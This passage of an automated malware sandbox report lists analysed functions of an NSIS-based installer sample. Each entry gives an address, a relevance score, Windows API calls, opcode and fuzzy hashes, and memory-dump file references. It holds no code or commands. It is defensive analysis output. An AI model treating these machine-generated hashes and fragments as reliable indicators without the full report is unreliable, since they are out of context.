                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                                              • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409193 Relevance: 5.3, APIs: 4, Instructions: 274memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409128 Relevance: 5.3, APIs: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409285 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040925A Relevance: 5.2, APIs: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409157 Relevance: 5.2, APIs: 4, Instructions: 244COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004096F9 Relevance: 5.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407836 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: IndirectMessage
                                                                                                                                                                                                                                                              • String ID: NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 1874166685-2653429224
                                                                                                                                                                                                                                                              • Opcode ID: dbe3e938a00ec213380fa1ef53cd97e5e7902b6060af5153ce11b09e6e55bcdc
                                                                                                                                                                                                                                                              • Instruction ID: 9444a1e4a923a48ab17f742abb28227462c63e28ea4dce63fd6a814ca67eb090
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe3e938a00ec213380fa1ef53cd97e5e7902b6060af5153ce11b09e6e55bcdc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48F01776A043089FC750EF2DEA4460537E1EB48318F94C03ED844E7360EB789895CB8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403AE9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                              • String ID: <@
                                                                                                                                                                                                                                                              • API String ID: 2738559852-4072043054
                                                                                                                                                                                                                                                              • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                              • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407A46 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                                              • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040774B Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                                                                              • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403B31 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
